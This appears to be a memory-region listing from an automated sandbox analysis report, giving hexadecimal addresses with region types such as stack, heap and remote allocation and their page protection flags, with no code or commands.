58586FE000
|
stack
|
page read and write
|
||
|
1A0CA870000
|
heap
|
page execute and read and write
|
||
|
1A0CBBE1000
|
trusted library allocation
|
page read and write
|
||
|
208EE000
|
stack
|
page read and write
|
||
|
2293C125000
|
heap
|
page read and write
|
||
|
1A0C8B78000
|
heap
|
page read and write
|
||
|
52C0000
|
heap
|
page read and write
|
||
|
507E000
|
stack
|
page read and write
|
||
|
7E20000
|
trusted library allocation
|
page read and write
|
||
|
3530000
|
trusted library allocation
|
page read and write
|
||
|
7FF8490B0000
|
trusted library allocation
|
page read and write
|
||
|
2293BD83000
|
heap
|
page read and write
|
||
|
7610000
|
direct allocation
|
page read and write
|
||
|
8D8C000
|
stack
|
page read and write
|
||
|
1A0CAE16000
|
trusted library allocation
|
page read and write
|
||
|
2293C00F000
|
heap
|
page read and write
|
||
|
5E2DFEE000
|
stack
|
page read and write
|
||
|
2293BD44000
|
heap
|
page read and write
|
||
|
2293BD35000
|
heap
|
page read and write
|
||
|
1A0E2D60000
|
heap
|
page read and write
|
||
|
1A0CC784000
|
trusted library allocation
|
page read and write
|
||
|
22939E6E000
|
heap
|
page read and write
|
||
|
2293BE00000
|
heap
|
page read and write
|
||
|
2293BD3F000
|
heap
|
page read and write
|
||
|
5E2F48D000
|
stack
|
page read and write
|
||
|
1A0C8AC0000
|
heap
|
page read and write
|
||
|
2092F000
|
stack
|
page read and write
|
||
|
15A10860000
|
heap
|
page read and write
|
||
|
2293BD4C000
|
heap
|
page read and write
|
||
|
2096D000
|
stack
|
page read and write
|
||
|
7E40000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FDA000
|
trusted library allocation
|
page read and write
|
||
|
1A0CADD4000
|
trusted library allocation
|
page read and write
|
||
|
2293BD5A000
|
heap
|
page read and write
|
||
|
2293BD89000
|
heap
|
page read and write
|
||
|
767D000
|
stack
|
page read and write
|
||
|
89C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7EE0000
|
trusted library allocation
|
page read and write
|
||
|
8A0B000
|
heap
|
page read and write
|
||
|
7A75000
|
heap
|
page read and write
|
||
|
2293BD1C000
|
heap
|
page read and write
|
||
|
58589FF000
|
stack
|
page read and write
|
||
|
209EE000
|
stack
|
page read and write
|
||
|
8A1C000
|
heap
|
page read and write
|
||
|
2293C0F6000
|
heap
|
page read and write
|
||
|
7FF849040000
|
trusted library allocation
|
page read and write
|
||
|
79EE000
|
stack
|
page read and write
|
||
|
6111000
|
trusted library allocation
|
page read and write
|
||
|
2293BD68000
|
heap
|
page read and write
|
||
|
5E2E83E000
|
stack
|
page read and write
|
||
|
1A0CC701000
|
trusted library allocation
|
page read and write
|
||
|
2293BD19000
|
heap
|
page read and write
|
||
|
2C40000
|
heap
|
page read and write
|
||
|
35A1000
|
remote allocation
|
page execute and read and write
|
||
|
7FF848E23000
|
trusted library allocation
|
page execute and read and write
|
||
|
20CDF000
|
stack
|
page read and write
|
||
|
2293C0F6000
|
heap
|
page read and write
|
||
|
2293C320000
|
heap
|
page read and write
|
||
|
2293BD5A000
|
heap
|
page read and write
|
||
|
7CD0000
|
trusted library allocation
|
page read and write
|
||
|
54BB000
|
heap
|
page read and write
|
||
|
2293BD95000
|
heap
|
page read and write
|
||
|
7B40000
|
heap
|
page execute and read and write
|
||
|
5BFF000
|
trusted library allocation
|
page read and write
|
||
|
2293C034000
|
heap
|
page read and write
|
||
|
2A7D000
|
stack
|
page read and write
|
||
|
7600000
|
direct allocation
|
page read and write
|
||
|
2293BD46000
|
heap
|
page read and write
|
||
|
2293BE65000
|
heap
|
page read and write
|
||
|
2293BD70000
|
heap
|
page read and write
|
||
|
3590000
|
trusted library allocation
|
page read and write
|
||
|
354D000
|
trusted library allocation
|
page execute and read and write
|
||
|
50FF000
|
stack
|
page read and write
|
||
|
1A0CB15D000
|
trusted library allocation
|
page read and write
|
||
|
8BD0000
|
trusted library allocation
|
page read and write
|
||
|
2293C304000
|
heap
|
page read and write
|
||
|
7A30000
|
heap
|
page read and write
|
||
|
1A0DA930000
|
trusted library allocation
|
page read and write
|
||
|
7FF848EDC000
|
trusted library allocation
|
page execute and read and write
|
||
|
5E2E9BB000
|
stack
|
page read and write
|
||
|
5E2F50B000
|
stack
|
page read and write
|
||
|
2293BD74000
|
heap
|
page read and write
|
||
|
7FF849070000
|
trusted library allocation
|
page read and write
|
||
|
33B0000
|
heap
|
page read and write
|
||
|
2293C139000
|
heap
|
page read and write
|
||
|
2293BEB6000
|
heap
|
page read and write
|
||
|
2293B9A0000
|
remote allocation
|
page read and write
|
||
|
7FF849140000
|
trusted library allocation
|
page read and write
|
||
|
20C60000
|
remote allocation
|
page read and write
|
||
|
2293BD61000
|
heap
|
page read and write
|
||
|
5858CFC000
|
stack
|
page read and write
|
||
|
364B000
|
heap
|
page read and write
|
||
|
1A0C8AF0000
|
heap
|
page read and write
|
||
|
2BF0000
|
heap
|
page read and write
|
||
|
2293BD07000
|
heap
|
page read and write
|
||
|
3543000
|
trusted library allocation
|
page execute and read and write
|
||
|
7EF0000
|
trusted library allocation
|
page read and write
|
||
|
5E2E3FE000
|
stack
|
page read and write
|
||
|
1A0E2EF2000
|
heap
|
page read and write
|
||
|
1A0CAB49000
|
trusted library allocation
|
page read and write
|
||
|
50BE000
|
stack
|
page read and write
|
||
|
2293BE84000
|
heap
|
page read and write
|
||
|
2293BD85000
|
heap
|
page read and write
|
||
|
2293BEB6000
|
heap
|
page read and write
|
||
|
1A0E2D80000
|
heap
|
page read and write
|
||
|
88C7000
|
stack
|
page read and write
|
||
|
5E2E37C000
|
stack
|
page read and write
|
||
|
5E2E8BE000
|
stack
|
page read and write
|
||
|
54BE000
|
heap
|
page read and write
|
||
|
2293BD98000
|
heap
|
page read and write
|
||
|
2293BE79000
|
heap
|
page read and write
|
||
|
1A0CADA6000
|
trusted library allocation
|
page read and write
|
||
|
7FF848F40000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D6CBAD000
|
stack
|
page read and write
|
||
|
3570000
|
trusted library allocation
|
page read and write
|
||
|
2293BE0D000
|
heap
|
page read and write
|
||
|
7E10000
|
trusted library allocation
|
page execute and read and write
|
||
|
2293BD41000
|
heap
|
page read and write
|
||
|
54C1000
|
heap
|
page read and write
|
||
|
20B7E000
|
stack
|
page read and write
|
||
|
2293BD56000
|
heap
|
page read and write
|
||
|
7DAE000
|
stack
|
page read and write
|
||
|
8EC0000
|
trusted library allocation
|
page read and write
|
||
|
20AAE000
|
stack
|
page read and write
|
||
|
7FF848E3B000
|
trusted library allocation
|
page read and write
|
||
|
7FF848FE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A0CA520000
|
heap
|
page readonly
|
||
|
2293BD1C000
|
heap
|
page read and write
|
||
|
5420000
|
direct allocation
|
page read and write
|
||
|
22939E6D000
|
heap
|
page read and write
|
||
|
22939F3E000
|
heap
|
page read and write
|
||
|
1A0CA530000
|
trusted library allocation
|
page read and write
|
||
|
2293C0F6000
|
heap
|
page read and write
|
||
|
2293BE91000
|
heap
|
page read and write
|
||
|
2293BE50000
|
heap
|
page read and write
|
||
|
22939E69000
|
heap
|
page read and write
|
||
|
1A0CC76C000
|
trusted library allocation
|
page read and write
|
||
|
748E000
|
stack
|
page read and write
|
||
|
54A7000
|
heap
|
page read and write
|
||
|
2293BD93000
|
heap
|
page read and write
|
||
|
2293C182000
|
heap
|
page read and write
|
||
|
7FF848EE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2293BE9E000
|
heap
|
page read and write
|
||
|
2293BD6E000
|
heap
|
page read and write
|
||
|
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
|
3617000
|
heap
|
page read and write
|
||
|
2293BE9B000
|
heap
|
page read and write
|
||
|
1A0CA877000
|
heap
|
page execute and read and write
|
||
|
4F79000
|
heap
|
page read and write
|
||
|
755D000
|
stack
|
page read and write
|
||
|
7FF848FC0000
|
trusted library allocation
|
page read and write
|
||
|
1A0CA4F0000
|
trusted library allocation
|
page read and write
|
||
|
8E4E000
|
stack
|
page read and write
|
||
|
2293B9B0000
|
heap
|
page read and write
|
||
|
1A0CBD7D000
|
trusted library allocation
|
page read and write
|
||
|
1A0E2EA5000
|
heap
|
page read and write
|
||
|
2293BD5A000
|
heap
|
page read and write
|
||
|
2293BD5A000
|
heap
|
page read and write
|
||
|
1A0CB183000
|
trusted library allocation
|
page read and write
|
||
|
1A0DAC15000
|
trusted library allocation
|
page read and write
|
||
|
2293C09C000
|
heap
|
page read and write
|
||
|
7B58000
|
trusted library allocation
|
page read and write
|
||
|
1A0C8B5A000
|
heap
|
page read and write
|
||
|
5448000
|
heap
|
page read and write
|
||
|
2293C000000
|
heap
|
page read and write
|
||
|
33FD000
|
stack
|
page read and write
|
||
|
5E2E47E000
|
stack
|
page read and write
|
||
|
74CF000
|
stack
|
page read and write
|
||
|
1A0CA780000
|
heap
|
page read and write
|
||
|
2293BD31000
|
heap
|
page read and write
|
||
|
1A0E2E9B000
|
heap
|
page read and write
|
||
|
2293BE01000
|
heap
|
page read and write
|
||
|
75B0000
|
direct allocation
|
page read and write
|
||
|
2293C1D0000
|
heap
|
page read and write
|
||
|
1A0CA810000
|
heap
|
page execute and read and write
|
||
|
2293C0E0000
|
heap
|
page read and write
|
||
|
1A0CA921000
|
trusted library allocation
|
page read and write
|
||
|
2293C12A000
|
heap
|
page read and write
|
||
|
22939F2A000
|
heap
|
page read and write
|
||
|
2293C088000
|
heap
|
page read and write
|
||
|
7CB7000
|
trusted library allocation
|
page read and write
|
||
|
4F40000
|
heap
|
page execute and read and write
|
||
|
7B81000
|
heap
|
page read and write
|
||
|
2293BD5A000
|
heap
|
page read and write
|
||
|
2293BD83000
|
heap
|
page read and write
|
||
|
2293C145000
|
heap
|
page read and write
|
||
|
5B83000
|
trusted library allocation
|
page read and write
|
||
|
8D4C000
|
stack
|
page read and write
|
||
|
8A28000
|
heap
|
page read and write
|
||
|
76BA000
|
stack
|
page read and write
|
||
|
75E0000
|
direct allocation
|
page read and write
|
||
|
1A0C8BA6000
|
heap
|
page read and write
|
||
|
2293C254000
|
heap
|
page read and write
|
||
|
63B7000
|
trusted library allocation
|
page read and write
|
||
|
20540000
|
direct allocation
|
page read and write
|
||
|
2293BD5B000
|
heap
|
page read and write
|
||
|
20C60000
|
remote allocation
|
page read and write
|
||
|
4EF8000
|
trusted library allocation
|
page read and write
|
||
|
2293BE01000
|
heap
|
page read and write
|
||
|
2293C142000
|
heap
|
page read and write
|
||
|
1A0CADBF000
|
trusted library allocation
|
page read and write
|
||
|
7CB0000
|
trusted library allocation
|
page read and write
|
||
|
7F3B000
|
stack
|
page read and write
|
||
|
2293C0F8000
|
heap
|
page read and write
|
||
|
20BBD000
|
stack
|
page read and write
|
||
|
1A0CC6F9000
|
trusted library allocation
|
page read and write
|
||
|
2293BEB6000
|
heap
|
page read and write
|
||
|
2293BD78000
|
heap
|
page read and write
|
||
|
15A10CA5000
|
heap
|
page read and write
|
||
|
75C0000
|
direct allocation
|
page read and write
|
||
|
8EF0000
|
direct allocation
|
page read and write
|
||
|
2293BD5F000
|
heap
|
page read and write
|
||
|
2293BE7C000
|
heap
|
page read and write
|
||
|
75A0000
|
direct allocation
|
page read and write
|
||
|
54FD000
|
heap
|
page read and write
|
||
|
2293BD67000
|
heap
|
page read and write
|
||
|
2293BE81000
|
heap
|
page read and write
|
||
|
3550000
|
trusted library allocation
|
page read and write
|
||
|
4F10000
|
trusted library allocation
|
page read and write
|
||
|
88E0000
|
trusted library allocation
|
page read and write
|
||
|
2293C0E0000
|
heap
|
page read and write
|
||
|
7DED000
|
stack
|
page read and write
|
||
|
54A7000
|
heap
|
page read and write
|
||
|
1A0CA5A0000
|
trusted library allocation
|
page read and write
|
||
|
2293BD5A000
|
heap
|
page read and write
|
||
|
8A69000
|
heap
|
page read and write
|
||
|
2293BD8D000
|
heap
|
page read and write
|
||
|
22939E68000
|
heap
|
page read and write
|
||
|
7E70000
|
trusted library allocation
|
page read and write
|
||
|
2293BEA3000
|
heap
|
page read and write
|
||
|
4F70000
|
heap
|
page read and write
|
||
|
54FA000
|
heap
|
page read and write
|
||
|
1A0CA910000
|
heap
|
page execute and read and write
|
||
|
22939E60000
|
heap
|
page read and write
|
||
|
3544000
|
trusted library allocation
|
page read and write
|
||
|
7EB0000
|
trusted library allocation
|
page read and write
|
||
|
385D000
|
heap
|
page read and write
|
||
|
2293BE89000
|
heap
|
page read and write
|
||
|
204F0000
|
direct allocation
|
page read and write
|
||
|
2A00000
|
remote allocation
|
page execute and read and write
|
||
|
2293C321000
|
heap
|
page read and write
|
||
|
7FF848FF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2293C257000
|
heap
|
page read and write
|
||
|
2293BD5A000
|
heap
|
page read and write
|
||
|
2293BD83000
|
heap
|
page read and write
|
||
|
57A0000
|
heap
|
page read and write
|
||
|
15A10CA0000
|
heap
|
page read and write
|
||
|
8A51000
|
heap
|
page read and write
|
||
|
54FC000
|
heap
|
page read and write
|
||
|
7E90000
|
trusted library allocation
|
page read and write
|
||
|
2293C079000
|
heap
|
page read and write
|
||
|
7FF848E2D000
|
trusted library allocation
|
page execute and read and write
|
||
|
5269000
|
trusted library allocation
|
page read and write
|
||
|
8F90000
|
direct allocation
|
page read and write
|
||
|
7FF848E22000
|
trusted library allocation
|
page read and write
|
||
|
2293BD24000
|
heap
|
page read and write
|
||
|
8E90000
|
trusted library allocation
|
page read and write
|
||
|
7A69000
|
heap
|
page read and write
|
||
|
7E30000
|
heap
|
page read and write
|
||
|
2293C0F6000
|
heap
|
page read and write
|
||
|
7E00000
|
trusted library allocation
|
page read and write
|
||
|
2293BD06000
|
heap
|
page read and write
|
||
|
3840000
|
trusted library allocation
|
page execute and read and write
|
||
|
77BD000
|
stack
|
page read and write
|
||
|
1A0CC991000
|
trusted library allocation
|
page read and write
|
||
|
356A000
|
trusted library allocation
|
page execute and read and write
|
||
|
A411000
|
direct allocation
|
page execute and read and write
|
||
|
2293C097000
|
heap
|
page read and write
|
||
|
7FF848ED6000
|
trusted library allocation
|
page read and write
|
||
|
7FF849180000
|
trusted library allocation
|
page read and write
|
||
|
5858BFB000
|
stack
|
page read and write
|
||
|
1A0CC6FD000
|
trusted library allocation
|
page read and write
|
||
|
2293C121000
|
heap
|
page read and write
|
||
|
7FF849110000
|
trusted library allocation
|
page read and write
|
||
|
2293BD14000
|
heap
|
page read and write
|
||
|
2293BD6F000
|
heap
|
page read and write
|
||
|
2293BD93000
|
heap
|
page read and write
|
||
|
22939E30000
|
heap
|
page read and write
|
||
|
54BB000
|
heap
|
page read and write
|
||
|
2293BD04000
|
heap
|
page read and write
|
||
|
3645000
|
heap
|
page read and write
|
||
|
7FF849002000
|
trusted library allocation
|
page read and write
|
||
|
22939E65000
|
heap
|
page read and write
|
||
|
7FF849050000
|
trusted library allocation
|
page read and write
|
||
|
20C9E000
|
stack
|
page read and write
|
||
|
3160000
|
heap
|
page read and write
|
||
|
2293BD5A000
|
heap
|
page read and write
|
||
|
1A0CC6DA000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
|
2293BD5A000
|
heap
|
page read and write
|
||
|
2293BD69000
|
heap
|
page read and write
|
||
|
1A0C8E95000
|
heap
|
page read and write
|
||
|
1A0CAD92000
|
trusted library allocation
|
page read and write
|
||
|
2293BEA6000
|
heap
|
page read and write
|
||
|
2293C0DA000
|
heap
|
page read and write
|
||
|
2293BE94000
|
heap
|
page read and write
|
||
|
1A0C8AD0000
|
heap
|
page read and write
|
||
|
22939F3D000
|
heap
|
page read and write
|
||
|
3510000
|
trusted library section
|
page read and write
|
||
|
5430000
|
direct allocation
|
page read and write
|
||
|
2293C0BA000
|
heap
|
page read and write
|
||
|
2293BD64000
|
heap
|
page read and write
|
||
|
2293C101000
|
heap
|
page read and write
|
||
|
2293C132000
|
heap
|
page read and write
|
||
|
2293C25B000
|
heap
|
page read and write
|
||
|
7FF848ED0000
|
trusted library allocation
|
page read and write
|
||
|
2293BE58000
|
heap
|
page read and write
|
||
|
2293BE35000
|
heap
|
page read and write
|
||
|
204E0000
|
direct allocation
|
page read and write
|
||
|
7FF849100000
|
trusted library allocation
|
page read and write
|
||
|
1A0E2E91000
|
heap
|
page read and write
|
||
|
1A0C8B10000
|
heap
|
page read and write
|
||
|
1A0CA606000
|
heap
|
page read and write
|
||
|
2293C08B000
|
heap
|
page read and write
|
||
|
2293BE8C000
|
heap
|
page read and write
|
||
|
2293C0E0000
|
heap
|
page read and write
|
||
|
5858FFE000
|
stack
|
page read and write
|
||
|
1A0E2F1B000
|
heap
|
page read and write
|
||
|
2293BD61000
|
heap
|
page read and write
|
||
|
2293BD98000
|
heap
|
page read and write
|
||
|
3830000
|
heap
|
page readonly
|
||
|
2293C0A6000
|
heap
|
page read and write
|
||
|
2BA1000
|
remote allocation
|
page execute and read and write
|
||
|
2293C1D0000
|
heap
|
page read and write
|
||
|
204D0000
|
direct allocation
|
page read and write
|
||
|
5E2E27E000
|
stack
|
page read and write
|
||
|
1A0CC8A3000
|
trusted library allocation
|
page read and write
|
||
|
2293BD13000
|
heap
|
page read and write
|
||
|
5E2E93E000
|
stack
|
page read and write
|
||
|
2293BEB6000
|
heap
|
page read and write
|
||
|
2293BD02000
|
heap
|
page read and write
|
||
|
7EA0000
|
trusted library allocation
|
page read and write
|
||
|
7FF849160000
|
trusted library allocation
|
page read and write
|
||
|
2293B9A0000
|
remote allocation
|
page read and write
|
||
|
2293C09D000
|
heap
|
page read and write
|
||
|
343F000
|
stack
|
page read and write
|
||
|
3654000
|
heap
|
page read and write
|
||
|
3277000
|
stack
|
page read and write
|
||
|
2293BE38000
|
heap
|
page read and write
|
||
|
2293BD61000
|
heap
|
page read and write
|
||
|
20530000
|
direct allocation
|
page read and write
|
||
|
2293BE74000
|
heap
|
page read and write
|
||
|
5CAB000
|
trusted library allocation
|
page read and write
|
||
|
2293C0F7000
|
heap
|
page read and write
|
||
|
2293BEB6000
|
heap
|
page read and write
|
||
|
89E0000
|
heap
|
page read and write
|
||
|
22939E70000
|
heap
|
page read and write
|
||
|
7C70000
|
trusted library allocation
|
page read and write
|
||
|
5858AFF000
|
stack
|
page read and write
|
||
|
5E2E6B7000
|
stack
|
page read and write
|
||
|
1A0CC714000
|
trusted library allocation
|
page read and write
|
||
|
3850000
|
heap
|
page read and write
|
||
|
7FF849030000
|
trusted library allocation
|
page read and write
|
||
|
2293C0E0000
|
heap
|
page read and write
|
||
|
22939E6D000
|
heap
|
page read and write
|
||
|
5310000
|
heap
|
page read and write
|
||
|
2293BD5A000
|
heap
|
page read and write
|
||
|
516D000
|
trusted library allocation
|
page read and write
|
||
|
7630000
|
heap
|
page execute and read and write
|
||
|
2293C24C000
|
heap
|
page read and write
|
||
|
2293BEB6000
|
heap
|
page read and write
|
||
|
5E2E738000
|
stack
|
page read and write
|
||
|
2293BD5A000
|
heap
|
page read and write
|
||
|
5330000
|
heap
|
page read and write
|
||
|
22939FF3000
|
heap
|
page read and write
|
||
|
4EEE000
|
stack
|
page read and write
|
||
|
503E000
|
stack
|
page read and write
|
||
|
2293BE71000
|
heap
|
page read and write
|
||
|
54FC000
|
heap
|
page read and write
|
||
|
2293C06E000
|
heap
|
page read and write
|
||
|
58587FF000
|
stack
|
page read and write
|
||
|
2293BD5C000
|
heap
|
page read and write
|
||
|
2293BD83000
|
heap
|
page read and write
|
||
|
5858399000
|
stack
|
page read and write
|
||
|
2293BD38000
|
heap
|
page read and write
|
||
|
2C6C000
|
heap
|
page read and write
|
||
|
3559000
|
trusted library allocation
|
page read and write
|
||
|
773B000
|
stack
|
page read and write
|
||
|
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
|
22939E6E000
|
heap
|
page read and write
|
||
|
20AEF000
|
stack
|
page read and write
|
||
|
2293C052000
|
heap
|
page read and write
|
||
|
2293BE68000
|
heap
|
page read and write
|
||
|
1A0CA600000
|
heap
|
page read and write
|
||
|
2293C0F6000
|
heap
|
page read and write
|
||
|
2C60000
|
heap
|
page read and write
|
||
|
B811000
|
direct allocation
|
page execute and read and write
|
||
|
2293BD89000
|
heap
|
page read and write
|
||
|
2293BD4E000
|
heap
|
page read and write
|
||
|
7E80000
|
trusted library allocation
|
page read and write
|
||
|
8E8D000
|
stack
|
page read and write
|
||
|
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
|
15A10B00000
|
heap
|
page read and write
|
||
|
1A0CC6D7000
|
trusted library allocation
|
page read and write
|
||
|
2293BD6D000
|
heap
|
page read and write
|
||
|
5790000
|
direct allocation
|
page read and write
|
||
|
2293BD5A000
|
heap
|
page read and write
|
||
|
2293BE30000
|
heap
|
page read and write
|
||
|
2293C0FA000
|
heap
|
page read and write
|
||
|
2293C0BA000
|
heap
|
page read and write
|
||
|
3520000
|
trusted library section
|
page read and write
|
||
|
363E000
|
heap
|
page read and write
|
||
|
8F20000
|
direct allocation
|
page read and write
|
||
|
20A2E000
|
stack
|
page read and write
|
||
|
20500000
|
direct allocation
|
page read and write
|
||
|
549F000
|
heap
|
page read and write
|
||
|
15A10930000
|
heap
|
page read and write
|
||
|
1A0E2C6B000
|
heap
|
page read and write
|
||
|
1A0CA9A7000
|
trusted library allocation
|
page read and write
|
||
|
22939F07000
|
heap
|
page read and write
|
||
|
4FBC000
|
stack
|
page read and write
|
||
|
2293C0AA000
|
heap
|
page read and write
|
||
|
2293BD83000
|
heap
|
page read and write
|
||
|
2C3E000
|
unkown
|
page read and write
|
||
|
2293BE60000
|
heap
|
page read and write
|
||
|
20C60000
|
remote allocation
|
page read and write
|
||
|
2293BD2C000
|
heap
|
page read and write
|
||
|
2293BD93000
|
heap
|
page read and write
|
||
|
7FF849020000
|
trusted library allocation
|
page read and write
|
||
|
1A0C8B64000
|
heap
|
page read and write
|
||
|
76FE000
|
stack
|
page read and write
|
||
|
22939F29000
|
heap
|
page read and write
|
||
|
2293C088000
|
heap
|
page read and write
|
||
|
6139000
|
trusted library allocation
|
page read and write
|
||
|
7635000
|
heap
|
page execute and read and write
|
||
|
75F0000
|
direct allocation
|
page read and write
|
||
|
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
|
2293BD5A000
|
heap
|
page read and write
|
||
|
2293C3D5000
|
heap
|
page read and write
|
||
|
89A0000
|
heap
|
page read and write
|
||
|
2293BE99000
|
heap
|
page read and write
|
||
|
3440000
|
heap
|
page read and write
|
||
|
2293BD7C000
|
heap
|
page read and write
|
||
|
2293BE48000
|
heap
|
page read and write
|
||
|
1A0DA941000
|
trusted library allocation
|
page read and write
|
||
|
7FF848E24000
|
trusted library allocation
|
page read and write
|
||
|
5E2E2FE000
|
stack
|
page read and write
|
||
|
7FF849170000
|
trusted library allocation
|
page read and write
|
||
|
54BB000
|
heap
|
page read and write
|
||
|
22939F00000
|
heap
|
page read and write
|
||
|
5E2E5BE000
|
stack
|
page read and write
|
||
|
2293BE40000
|
heap
|
page read and write
|
||
|
7CDA000
|
trusted library allocation
|
page read and write
|
||
|
2293BD21000
|
heap
|
page read and write
|
||
|
1A0CC770000
|
trusted library allocation
|
page read and write
|
||
|
2293C0E0000
|
heap
|
page read and write
|
||
|
7FF849150000
|
trusted library allocation
|
page read and write
|
||
|
7FF849190000
|
trusted library allocation
|
page read and write
|
||
|
2293C0B3000
|
heap
|
page read and write
|
||
|
7FF848F06000
|
trusted library allocation
|
page execute and read and write
|
||
|
2293BD0C000
|
heap
|
page read and write
|
||
|
2293BD5A000
|
heap
|
page read and write
|
||
|
7FF849060000
|
trusted library allocation
|
page read and write
|
||
|
2293BE3D000
|
heap
|
page read and write
|
||
|
1A0C8B1E000
|
heap
|
page read and write
|
||
|
2293BEB6000
|
heap
|
page read and write
|
||
|
5938000
|
trusted library allocation
|
page read and write
|
||
|
20D2C000
|
stack
|
page read and write
|
||
|
2293C0E0000
|
heap
|
page read and write
|
||
|
1A0DAC06000
|
trusted library allocation
|
page read and write
|
||
|
2293BD2C000
|
heap
|
page read and write
|
||
|
2F2E000
|
unkown
|
page read and write
|
||
|
2293C001000
|
heap
|
page read and write
|
||
|
2293C013000
|
heap
|
page read and write
|
||
|
7D6F000
|
stack
|
page read and write
|
||
|
22939FF3000
|
heap
|
page read and write
|
||
|
2293BD09000
|
heap
|
page read and write
|
||
|
8BF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
20DEF000
|
stack
|
page read and write
|
||
|
8F80000
|
direct allocation
|
page read and write
|
||
|
2293BD83000
|
heap
|
page read and write
|
||
|
78C0000
|
heap
|
page read and write
|
||
|
2293BD5A000
|
heap
|
page read and write
|
||
|
2293C04D000
|
heap
|
page read and write
|
||
|
2D6CEFF000
|
unkown
|
page read and write
|
||
|
1A0CADAA000
|
trusted library allocation
|
page read and write
|
||
|
2293BD11000
|
heap
|
page read and write
|
||
|
2293BEAB000
|
heap
|
page read and write
|
||
|
2293BEB3000
|
heap
|
page read and write
|
||
|
2293C0BA000
|
heap
|
page read and write
|
||
|
2293BD02000
|
heap
|
page read and write
|
||
|
306F000
|
stack
|
page read and write
|
||
|
4EAE000
|
stack
|
page read and write
|
||
|
549F000
|
heap
|
page read and write
|
||
|
2293BE9E000
|
heap
|
page read and write
|
||
|
2293C100000
|
heap
|
page read and write
|
||
|
54FD000
|
heap
|
page read and write
|
||
|
2293BEAE000
|
heap
|
page read and write
|
||
|
9A11000
|
direct allocation
|
page execute and read and write
|
||
|
2293BD5A000
|
heap
|
page read and write
|
||
|
2293C0BA000
|
heap
|
page read and write
|
||
|
2293BEB6000
|
heap
|
page read and write
|
||
|
2293C0F6000
|
heap
|
page read and write
|
||
|
2293C1A6000
|
heap
|
page read and write
|
||
|
2293BD5A000
|
heap
|
page read and write
|
||
|
20DAE000
|
stack
|
page read and write
|
||
|
49A1000
|
remote allocation
|
page execute and read and write
|
||
|
54C1000
|
heap
|
page read and write
|
||
|
7FF849130000
|
trusted library allocation
|
page read and write
|
||
|
1A0E2ED6000
|
heap
|
page read and write
|
||
|
2293C0B3000
|
heap
|
page read and write
|
||
|
2293BE05000
|
heap
|
page read and write
|
||
|
5480000
|
heap
|
page read and write
|
||
|
2293BD5A000
|
heap
|
page read and write
|
||
|
8E0C000
|
stack
|
page read and write
|
||
|
75D0000
|
direct allocation
|
page read and write
|
||
|
5E2E579000
|
stack
|
page read and write
|
||
|
1A0E2CC0000
|
heap
|
page read and write
|
||
|
2293BD0A000
|
heap
|
page read and write
|
||
|
2293BEB6000
|
heap
|
page read and write
|
||
|
5410000
|
heap
|
page readonly
|
||
|
8F00000
|
direct allocation
|
page read and write
|
||
|
1A0CBF66000
|
trusted library allocation
|
page read and write
|
||
|
1A0CC730000
|
trusted library allocation
|
page read and write
|
||
|
1A0CC822000
|
trusted library allocation
|
page read and write
|
||
|
2293C07F000
|
heap
|
page read and write
|
||
|
2293C156000
|
heap
|
page read and write
|
||
|
7CE0000
|
trusted library allocation
|
page read and write
|
||
|
8EA0000
|
trusted library allocation
|
page read and write
|
||
|
1A0CC72E000
|
trusted library allocation
|
page read and write
|
||
|
5E2E4FE000
|
stack
|
page read and write
|
||
|
1A0CC6EE000
|
trusted library allocation
|
page read and write
|
||
|
2293C841000
|
heap
|
page read and write
|
||
|
2293C143000
|
heap
|
page read and write
|
||
|
1A0CB1B8000
|
trusted library allocation
|
page read and write
|
||
|
1A0CB19E000
|
trusted library allocation
|
page read and write
|
||
|
777E000
|
stack
|
page read and write
|
||
|
2293C045000
|
heap
|
page read and write
|
||
|
2293BE25000
|
heap
|
page read and write
|
||
|
7A2E000
|
stack
|
page read and write
|
||
|
2293BD98000
|
heap
|
page read and write
|
||
|
7FF849120000
|
trusted library allocation
|
page read and write
|
||
|
54FF000
|
heap
|
page read and write
|
||
|
7C80000
|
trusted library allocation
|
page read and write
|
||
|
20520000
|
direct allocation
|
page read and write
|
||
|
2293BD24000
|
heap
|
page read and write
|
||
|
1A0CC716000
|
trusted library allocation
|
page read and write
|
||
|
8DCE000
|
stack
|
page read and write
|
||
|
2293BD5C000
|
heap
|
page read and write
|
||
|
1A0CA560000
|
trusted library allocation
|
page read and write
|
||
|
89B0000
|
heap
|
page read and write
|
||
|
7FF849010000
|
trusted library allocation
|
page execute and read and write
|
||
|
2293BD30000
|
heap
|
page read and write
|
||
|
7EC0000
|
trusted library allocation
|
page read and write
|
||
|
2293BD06000
|
heap
|
page read and write
|
||
|
2293BE10000
|
heap
|
page read and write
|
||
|
7FF849080000
|
trusted library allocation
|
page read and write
|
||
|
1A0CB1D2000
|
trusted library allocation
|
page read and write
|
||
|
1A0CC1E4000
|
trusted library allocation
|
page read and write
|
||
|
22939E69000
|
heap
|
page read and write
|
||
|
2293BD5A000
|
heap
|
page read and write
|
||
|
2745000
|
direct allocation
|
page read and write
|
||
|
2293C088000
|
heap
|
page read and write
|
||
|
54BF000
|
heap
|
page read and write
|
||
|
1A0E2E63000
|
heap
|
page read and write
|
||
|
1A0CC1E0000
|
trusted library allocation
|
page read and write
|
||
|
7B24000
|
heap
|
page read and write
|
||
|
1A0CC6F0000
|
trusted library allocation
|
page read and write
|
||
|
78B0000
|
heap
|
page read and write
|
||
|
1A0CA615000
|
heap
|
page read and write
|
||
|
1A0E2D17000
|
heap
|
page read and write
|
||
|
2293BD49000
|
heap
|
page read and write
|
||
|
2293C721000
|
heap
|
page read and write
|
||
|
2293C10F000
|
heap
|
page read and write
|
||
|
54B4000
|
heap
|
page read and write
|
||
|
2293BD64000
|
heap
|
page read and write
|
||
|
88F0000
|
trusted library allocation
|
page read and write
|
||
|
2F6E000
|
stack
|
page read and write
|
||
|
2293BD5A000
|
heap
|
page read and write
|
||
|
2293BD51000
|
heap
|
page read and write
|
||
|
2740000
|
direct allocation
|
